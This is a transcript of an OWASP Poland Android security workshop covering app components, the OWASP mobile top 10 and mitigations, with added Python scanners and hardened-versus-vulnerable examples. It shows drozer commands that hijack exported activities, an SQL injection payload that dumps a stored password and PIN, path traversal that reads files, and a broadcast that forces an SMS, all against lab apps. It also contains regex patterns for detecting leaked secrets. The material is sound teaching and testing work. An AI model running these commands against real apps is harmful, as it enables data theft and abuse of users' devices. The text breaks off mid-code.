[wroclaw #1] android security workshop
TRANSCRIPT
Android security workshop
OWASP Poland, 24.02.2016
Agenda
• Android fundamentals
• Application components security
• Coffee break (free cookies)
• OWASP top 10 mobile risks
• Reverse engineering & malware analysis
Android fundamentals
Andrii Sygida, OWASP Poland, 24.02.2016
Agenda
• Android architecture
• Android security fundamentals
• Android 6.0 security release
• Google security features
Intro
• Android is the world's most popular mobile platform
Features
• Multi-tasking
• Widgets
• Notifications
• Voice typing and actions
• Photos and video
• Most widely used smartphone OS
• Phones, tablets, Google TV and more
Stats
• There are 1.2 billion mobile users; by 2018 that number will be 5 billion
• Mobile adoption is growing 8x faster than traditional web applications
• Mobile payments will exceed $90 billion by 2017
Source: Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernel
• The architecture is based on the Linux kernel (starting from 2.6)
• This layer is the core of the Android architecture; it provides services like power management, memory management, security, etc.
• It helps in software/hardware binding for better communication
Libraries
• The next layer is Android's native libraries
• It is this layer that enables the device to handle different types of data
• The WebKit library is responsible for browser support, SQLite for databases, FreeType for font support, Media for playing and recording audio and video formats
Android Runtime
• Core libraries
• Dalvik Virtual Machine
• DVM vs JVM differences
• ART
Dalvik VM
• The software that runs the apps on Android devices
• It's fast even on weak CPUs
• It will run on systems with little memory
• It will run in an energy-efficient way
• Provides application portability and runtime consistency
• Runs an optimized file format (dex) and Dalvik bytecode
• Java class/jar files are converted to dex at build time
ART vs DVM
• Android 4.4 – experimental; from Android 5.0 – default
• Ahead-of-time (AOT) compilation
• Improved garbage collection
• Improved diagnostic detail in exceptions and crash reports
Application Framework
• Activity Manager – manages the activity life cycle of applications
• Content Providers – manage the data sharing between applications
• Telephony Manager – manages all voice calls
• Location Manager – location management using GPS or cell towers
• Resource Manager – manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
bull Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime permissions
• Verified Boot
• Hardware-isolated security
• Fingerprints
• SD card adoption
• Clear-text traffic
• System hardening
• USB access control
Defense layers: Google Play
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default, only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps: apps are verified prior to install
• Warn for or block Potentially Harmful Applications
• Over 10 million installs verified every day
• Verification is on and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
(diagram: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Example components attributes (diagram: Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    // explicit intent: the target component is named, so no other app can claim it
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android.
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed as a default package of AppUse together with adb, so it's enough to just „click and play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme (diagram: applications A, B and E)
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs an interaction point (it must be exported or respond to/accept input from message formats like intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions
    run app.provider.info --permission null
Content providers attacks
• Unrestricted access to app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.
    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
• SQL injection
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key;--"
    | Password         | pin  |
    | thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
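The three content-provider attacks above (unrestricted query, SQL injection through the projection/selection, path traversal through a file-serving provider) and their fixes, modelled in Python as an added example; this is not the Sieve app's code nor the workshop's. The Passwords/Key tables live in an in-memory SQLite database, the served files in a temporary directory, and the function names (query_vulnerable, query_hardened, open_file_vulnerable, open_file_hardened) are this example's own:

```python
"""Content-provider query()/openFile() logic modelled in Python so the three
attacks above can be run against a hardened version.  Constructed example,
not the Sieve app's code: the tables live in an in-memory SQLite database and
the served files in a temporary directory."""
import os
import sqlite3
import tempfile


def make_db():
    """Constructed Sieve-like schema: a Passwords table and a Key table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'mail', 'alice', 'hunter2');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return db


def query_vulnerable(db, projection=None, selection=None):
    """Caller-controlled projection and selection are pasted into the SQL,
    which is what an injectable provider's query() amounts to."""
    sql = "SELECT %s FROM Passwords" % (projection or "*")
    if selection:
        sql += " WHERE (%s)" % selection
    return db.execute(sql).fetchall()


ALLOWED_COLUMNS = {"_id", "service", "username"}   # password never leaves


def query_hardened(db, projection=None, where=None):
    """Projection and filter columns are checked against an allowlist (the
    job of a projection map) and filter values are bound as ? parameters, so
    the caller never supplies raw SQL."""
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    unknown = [c for c in cols + list(where or {}) if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("column not permitted: %s" % ", ".join(unknown))
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    args = []
    if where:
        sql += " WHERE " + " AND ".join("%s = ?" % c for c in where)
        args = list(where.values())
    return db.execute(sql, args).fetchall()


def make_backup_tree():
    """Constructed layout: a backup directory the provider may serve, next to
    a directory it must never expose."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "backup")
    os.makedirs(base)
    os.makedirs(os.path.join(root, "secret"))
    with open(os.path.join(base, "notes.txt"), "wb") as fh:
        fh.write(b"shopping list")
    with open(os.path.join(root, "secret", "hosts"), "wb") as fh:
        fh.write(b"127.0.0.1 localhost")
    return base


def open_file_vulnerable(base_dir, uri_path):
    """Joins the URI path straight onto the directory: '..' walks out of it."""
    with open(base_dir + "/" + uri_path, "rb") as fh:
        return fh.read()


def open_file_hardened(base_dir, uri_path):
    """Canonicalise first, then require the result to stay under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes provider directory: " + uri_path)
    with open(target, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, "* FROM Key--"))           # leaks the Key table
    print(query_hardened(db, ["username"], {"service": "mail"}))
    base = make_backup_tree()
    print(open_file_vulnerable(base, "../secret/hosts"))   # reads outside base
    try:
        open_file_hardened(base, "../secret/hosts")
    except PermissionError as err:
        print("blocked:", err)
```

`query_vulnerable(db, "* FROM Key--")` returns the Key table row exactly as the `--projection` trick above does (the payload's `;` is left out because Python's `sqlite3.execute()` accepts only one statement per call), while `query_hardened` refuses any column outside its allowlist and binds filter values as parameters. `open_file_hardened` canonicalises the path before checking that it is still under the provider's directory, which is what defeats the `../` walk.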
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        // sends an SMS built entirely from the incoming intent's extras,
        // without checking who sent the broadcast
        sms.sendTextMessage(bundle.getString("phoneNumber"), null,
                bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Broadcast receivers attacks
    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain-text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze package files at different stages:
    adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage – mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
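The how-to-find steps earlier in this section end with a pulled copy of /data/data/<package>, and the mitigations above (nothing world-readable, no secrets in shared preferences or databases) can then be checked over that copy. The scanner below is an added example, not the workshop's code: make_sample_data_dir() builds a constructed directory imitating a package's shared_prefs and databases folders, and the SENSITIVE keyword list is a heuristic of this example's own:

```python
"""Scan a pulled app data directory (adb pull /data/data/<pkg>) for insecure
storage: world-readable files and secrets in shared_prefs XML or SQLite
tables.  Constructed example; make_sample_data_dir() creates throwaway data."""
import os
import re
import sqlite3
import stat
import tempfile
import xml.etree.ElementTree as ET

# Heuristic key/column names worth a closer look (this example's own list).
SENSITIVE = re.compile(r"pass(word|wd)?|secret|token|\bpin\b|session|api.?key", re.I)


def make_sample_data_dir():
    """Build a hypothetical package's data directory with one world-readable
    preferences file holding a password and a private DB holding a token."""
    root = tempfile.mkdtemp()
    prefs = os.path.join(root, "shared_prefs")
    dbs = os.path.join(root, "databases")
    os.makedirs(prefs)
    os.makedirs(dbs)
    login_xml = os.path.join(prefs, "login.xml")
    with open(login_xml, "w") as fh:
        fh.write('<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n'
                 '<map>\n'
                 '  <string name="username">alice</string>\n'
                 '  <string name="password">hunter2</string>\n'
                 '  <boolean name="remember_me" value="true" />\n'
                 '</map>\n')
    os.chmod(login_xml, 0o664)          # readable by any uid, as MODE_WORLD_READABLE makes it
    app_db = os.path.join(dbs, "app.db")
    db = sqlite3.connect(app_db)
    db.execute("CREATE TABLE account (id INTEGER, email TEXT, auth_token TEXT)")
    db.execute("INSERT INTO account VALUES (1, 'alice@example.com', 'tok_constructed')")
    db.commit()
    db.close()
    os.chmod(app_db, 0o600)             # private to the app's uid
    return root


def world_readable(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def scan_prefs(path):
    """Names of preferences whose key looks sensitive."""
    root = ET.parse(path).getroot()
    return [e.get("name") for e in root if SENSITIVE.search(e.get("name", ""))]


def scan_sqlite(path):
    """(table, column) pairs whose column name looks sensitive."""
    db = sqlite3.connect(path)
    hits = []
    for (table,) in db.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for col in db.execute('PRAGMA table_info("%s")' % table):
            if SENSITIVE.search(col[1]):
                hits.append((table, col[1]))
    db.close()
    return hits


def scan_data_dir(root):
    """Walk the pulled directory and return sorted (relative path, issue) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if world_readable(path):
                findings.append((rel, "world-readable"))
            if os.path.basename(dirpath) == "shared_prefs" and name.endswith(".xml"):
                for key in scan_prefs(path):
                    findings.append((rel, "sensitive preference: " + key))
            elif name.endswith(".db"):
                for table, col in scan_sqlite(path):
                    findings.append((rel, "sensitive column: %s.%s" % (table, col)))
    return sorted(findings)


if __name__ == "__main__":
    for rel, issue in scan_data_dir(make_sample_data_dir()):
        print(rel, "->", issue)
```

Point scan_data_dir() at the directory adb pull produced; a sensitive column in a 0600 database is a finding worth encrypting (SQLCipher), and a world-readable preferences file is a finding regardless of what it holds.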
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, „incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a „chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning – theory
• The expected X.509 certificate or public key is embedded in the source code
    if (presented_cert == pinned_cert)
        start_connection();
    else
        drop_connection();
Cert Pinning – reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use MalloDroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
    dz> run scanner.provider.finduris -a <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage – mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
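The logcat step in the how-to-find list produces a lot of noise, so a small parser that keeps only the app's PID and applies a few leak patterns makes the first mitigation above (never log sensitive information) checkable on every build. This is an added example, not the workshop's code: the log excerpt is constructed in logcat's threadtime format, PID 1234 is assumed to be the app under test, and the leak patterns are this example's own heuristics:

```python
"""Parse logcat threadtime output and flag lines from the app under test
that look like they leak secrets.  Constructed example: the log excerpt is
made up and the leak patterns are this example's own heuristics."""
import re

# threadtime format: "MM-DD HH:MM:SS.mmm  PID  TID L TAG: message"
LOGCAT_THREADTIME = re.compile(
    r"^(?P<date>\d\d-\d\d)\s+(?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>\S.*?)\s*:\s(?P<msg>.*)$")

LEAK_PATTERNS = {
    "credential": re.compile(r"\b(pass(word|wd)?|pwd|pin)\s*[=:]\s*\S+", re.I),
    "bearer_token": re.compile(r"(Authorization:\s*Bearer|\btoken\s*[=:])\s*\S+", re.I),
    "location": re.compile(r"\b(lat|latitude|lon|lng|longitude)\s*[=:]\s*-?\d+\.\d+", re.I),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
}

# Constructed excerpt; PID 1234 is the hypothetical app under test.
LOG_SAMPLE = """\
02-24 10:15:01.123  1234  1234 D LoginActivity: attempting login for user=alice password=hunter2
02-24 10:15:01.456  1234  1250 I OkHttp  : --> POST https://api.example.com/login
02-24 10:15:01.789  1234  1250 I OkHttp  : Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.c0nstructed
02-24 10:15:02.001   987   987 I ActivityManager: Displayed com.example.notes/.MainActivity: +512ms
02-24 10:15:02.300  1234  1234 D LocationHelper: lat=51.1079 lon=17.0385
02-24 10:15:03.000  2222  2222 E Crashlog: NullPointerException while sending mail for bob@example.com
"""


def parse_logcat(text):
    """Yield (line number, field dict) for every well-formed threadtime line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOGCAT_THREADTIME.match(line)
        if m:
            yield lineno, m.groupdict()


def find_leaks(text, pid=None):
    """Return (line number, tag, leak kind) for suspicious messages; when pid
    is given, only that process's lines are examined."""
    findings = []
    for lineno, entry in parse_logcat(text):
        if pid is not None and int(entry["pid"]) != pid:
            continue
        for kind, pattern in LEAK_PATTERNS.items():
            if pattern.search(entry["msg"]):
                findings.append((lineno, entry["tag"], kind))
    return findings


if __name__ == "__main__":
    for lineno, tag, kind in find_leaks(LOG_SAMPLE, pid=1234):
        print("line %d [%s]: %s" % (lineno, tag, kind))
```

Feed it the output of `adb logcat -v threadtime` (the format the regex expects) with the PID from `adb shell pidof <package>`; the e-mail on line 6 belongs to another process and is only reported when no PID filter is given.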
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong-password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
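The how-to-find lists for M3 earlier (trust-all TrustManagers, accept-all hostname verifiers, what MalloDroid looks for) and for M6 just above (hardcoded keys, RC4/MD5/SHA1) are both pattern searches over the decompiled Java, so one scanner serves both passages. It is an added example in the spirit of those checks, not MalloDroid's or the workshop's code: the rules are this example's own regular expressions, and the sample class NetClient is a constructed piece of decompiled source, not a real app:

```python
"""Regex checks over decompiled Java source for the TLS and crypto mistakes
listed in the slides.  Constructed example; rules and sample are made up."""
import re

# (finding id, pattern, rationale); heuristics over text, not a Java parser.
RULES = [
    ("tls.trust_all",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(throws[^{]*)?\{\s*\}"),
     "empty checkServerTrusted(): every certificate is accepted"),
    ("tls.allow_all_hostnames",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER|"
                r"verify\s*\(\s*String\s+\w+\s*,\s*SSLSession\s+\w+\s*\)\s*\{\s*return\s+true\s*;"),
     "hostname verification disabled"),
    ("tls.cleartext_url", re.compile(r'"http://[^"]+"'), "cleartext URL in code"),
    ("tls.weak_protocol", re.compile(r'"(SSLv2|SSLv3|SSL)"'), "SSLv2/SSLv3 requested"),
    ("crypto.weak_algorithm",
     re.compile(r'"(RC4|ARCFOUR|DES|MD4|MD5|SHA-?1)(/[^"]*)?"'),
     "weak or deprecated algorithm"),
    ("crypto.ecb_mode",
     re.compile(r'getInstance\s*\(\s*"AES(/ECB[^"]*)?"'),
     "AES without an explicit mode (defaults to ECB) or in ECB"),
    ("crypto.hardcoded_secret",
     re.compile(r'\w*(KEY|SECRET|PASSWORD|PASSWD|TOKEN)\w*\s*=\s*"[^"]{8,}"', re.I),
     "key material or credential in a string literal"),
]

# Constructed decompiled class showing several of the mistakes at once.
SAMPLE_SOURCE = """public class NetClient {
  private static final String API = "http://api.example.com/v1/login";
  private static final String KEY = "0123456789abcdef";
  static TrustManager[] trustAll = new TrustManager[] { new X509TrustManager() {
      public void checkClientTrusted(X509Certificate[] c, String a) {}
      public void checkServerTrusted(X509Certificate[] c, String a) {}
      public X509Certificate[] getAcceptedIssuers() { return null; }
  }};
  static HostnameVerifier hv = new HostnameVerifier() {
      public boolean verify(String hostname, SSLSession session) { return true; }
  };
  static byte[] encrypt(byte[] data) throws Exception {
      Cipher c = Cipher.getInstance("AES");
      c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY.getBytes(), "AES"));
      return c.doFinal(data);
  }
  static String digest(String s) throws Exception {
      return new String(MessageDigest.getInstance("MD5").digest(s.getBytes()));
  }
}
"""


def scan_source(java_text, path="<input>"):
    """Return (path, line, rule id, rationale) tuples sorted by position."""
    findings = []
    for rule_id, pattern, why in RULES:
        for m in pattern.finditer(java_text):
            line = java_text.count("\n", 0, m.start()) + 1
            findings.append((path, line, rule_id, why))
    return sorted(findings)


if __name__ == "__main__":
    for path, line, rule_id, why in scan_source(SAMPLE_SOURCE, "NetClient.java"):
        print("%s:%d %s (%s)" % (path, line, rule_id, why))
```

Run scan_source() over every .java file that JD-GUI or Luyten produced; on the sample it reports the cleartext URL, the literal key, the empty checkServerTrusted(), the always-true hostname verifier, AES with no mode (ECB by default) and MD5, each with its line number, while a clean `Cipher.getInstance("AES/GCM/NoPadding")` produces no finding.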
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
Broken Cryptography – example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography – mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
    Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection – mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  – http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling – mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
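The four mitigations above implemented on the server side, as an added example that is not the workshop's code: tokens come from the OS CSPRNG through Python's secrets module, every session carries an expiry, tokens are destroyed on logout and replaced whenever the authenticated user changes, and a FakeClock is included so the expiry behaviour can be exercised without waiting. The 30-minute default mirrors the check in the how-to-find slide; the class and method names are this example's own:

```python
"""Server-side session store covering the M9 mitigations: high-entropy
tokens, expiry, invalidation and rotation on authentication-state change.
Constructed example; the clock is injectable so expiry can be tested."""
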